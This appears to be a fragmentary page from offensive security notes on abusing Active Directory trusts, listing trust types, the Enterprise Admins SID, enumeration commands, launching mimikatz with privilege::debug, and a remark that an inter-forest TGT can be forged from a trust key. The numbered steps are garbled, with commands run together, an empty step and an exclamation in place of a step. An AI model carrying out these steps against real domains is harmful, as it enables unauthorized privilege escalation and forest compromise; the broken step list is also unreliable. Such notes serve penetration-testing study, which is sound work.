Types of trusts:
1) Directional
2) Transitive
Enterprise Admins (EA) Group default SID: S-1-5-21-ROOT_DOMAIN-519
1)
Get-ADComputer -Identity "DC"2)
Get-ADGroup -Identity "Enterprise Admins" -server PARENT_DOMAIN_CONTROLLER_FQDN3)
mimikatz.exe4)
privilege::debug5)
6) PWWWWWWWWWWNEEDDD!!!!!!
Obtain trust key between current domain and external domain
An inter-forest TGT can be forged
PreviousChild Domain to Parent Domain - Forest Compromise - extra SIDs (parent/child) (child/parent)NextEnumerate Trust Relationship
Last updated